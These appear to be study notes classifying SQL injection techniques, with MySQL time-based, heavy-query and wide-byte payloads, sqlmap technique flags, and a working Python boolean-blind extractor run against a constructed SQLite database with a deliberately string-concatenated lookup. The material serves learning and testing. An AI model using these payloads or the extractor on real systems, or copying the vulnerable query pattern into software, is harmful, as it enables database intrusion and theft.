Classification of SQL injection
- Error-based injection (the database error message carries the result of the injected expression)
- Boolean-based blind injection (only a true/false difference in the page is observable; data is recovered one yes/no question at a time)
select length(database())                             -- first recover the length, then each character
select ascii(substr(database(), 1, 1)) >= 115         -- 115 = 's'; >= comparisons allow a binary search per character (about 7 requests each)
- Time-based blind injection (no visible difference in the page; the answer is encoded in the response delay)
sleep() and benchmark()
if(ascii(substr(database(), 1, 1)) = 115, 1, sleep(3))
if(ascii(substr(database(), 1, 1)) = 115, 1, benchmark(10000000, md5(1)))
Note the polarity of the two payloads above: the delay fires when the guess is wrong (the else branch). Either polarity works as long as the extraction logic knows which one it is using.
A heavy query replaces sleep()/benchmark() with an expression that is expensive to evaluate, usually the Cartesian product of two or more large tables (useful when the sleep/benchmark functions are filtered). Here the delay fires when the guess is right (the then branch):
select 1 and if(ascii(substr(database(), 1, 1)) = 115, (select count(*) from information_schema.tables A, information_schema.tables B, information_schema.tables C), 1)
- Wide-byte injection (a multi-byte charset such as GBK lets an injected lead byte swallow the escaping backslash, e.g. %df%5c becomes one character, so the quote that follows is no longer escaped)
- Union query injection
- Stacked queries injection (several statements separated by ; in one request)
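The boolean-based blind technique above, carried through as a working extractor. This is an added example and not code from the original notes. It assumes a constructed SQLite in-memory database in place of MySQL: SQLite has no database() function, so the target is a constructed secret value, and SQLite's unicode() stands in for MySQL's ascii(). The vulnerable endpoint is a hypothetical string-concatenated lookup that reveals only whether a row came back.

```python
"""Boolean-based blind extraction against a constructed SQLite oracle.

Added example, not part of the original notes. MySQL database()/ascii()
are replaced by a constructed secret and SQLite's unicode().
"""
import sqlite3

# Constructed in-memory database: the table the injectable query reads,
# plus a secret the attacker wants to read without ever seeing query output.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE products(id INTEGER, name TEXT);
    INSERT INTO products VALUES (1, 'widget');
    CREATE TABLE secrets(name TEXT, value TEXT);
    INSERT INTO secrets VALUES ('admin_token', 'security');
""")

QUERIES = 0  # counts how many requests the extraction needed


def vulnerable_lookup(product_id: str) -> bool:
    """Hypothetical vulnerable endpoint: the id is concatenated into the
    query (assumption: the classic injection bug) and the caller only
    learns whether a row came back, never the data itself."""
    global QUERIES
    QUERIES += 1
    sql = "SELECT name FROM products WHERE id = " + product_id
    return conn.execute(sql).fetchone() is not None


# Stand-in for MySQL's database(): the value the attacker wants to read.
SECRET_EXPR = "(SELECT value FROM secrets WHERE name = 'admin_token')"


def oracle(condition: str) -> bool:
    """Ask one yes/no question by injecting '1 AND (<condition>)'."""
    return vulnerable_lookup("1 AND (" + condition + ")")


def _max_satisfying(lo: int, hi: int, predicate) -> int:
    """Binary search for the largest v in [lo, hi] with predicate(v) true,
    where predicate is monotone (true for all values up to the answer)."""
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if predicate(mid):
            lo = mid
        else:
            hi = mid - 1
    return lo


def extract_length(max_len: int = 64) -> int:
    """Mirror of 'select length(database())', answered with >= probes."""
    return _max_satisfying(
        0, max_len, lambda v: oracle(f"length({SECRET_EXPR}) >= {v}"))


def extract_char(pos: int) -> str:
    """Mirror of 'ascii(substr(database(), 1, 1)) >= 115' for position pos
    (1-based); unicode() is SQLite's equivalent of MySQL's ascii()."""
    code = _max_satisfying(
        0, 127,
        lambda v: oracle(f"unicode(substr({SECRET_EXPR}, {pos}, 1)) >= {v}"))
    return chr(code)


def extract_secret() -> str:
    """Recover the whole value, about seven oracle queries per character."""
    length = extract_length()
    return "".join(extract_char(i) for i in range(1, length + 1))


if __name__ == "__main__":
    value = extract_secret()
    print(f"recovered {value!r} in {QUERIES} requests")
```

The extractor only depends on oracle() returning a boolean, so the same binary search drives a time-based variant: swap in an oracle that sends the if(..., 1, sleep(3)) form and returns True when the response takes longer than a threshold (remembering which branch carries the delay).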
sqlmap uses --technique=TECH to select which injection techniques to test
--technique=BEUSTQ
The default is all of them; each letter enables one technique:
B: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries (must be included when using the file system, operating system or registry features, because those require executing additional statements)
T: Time-based blind
Q: Inline queries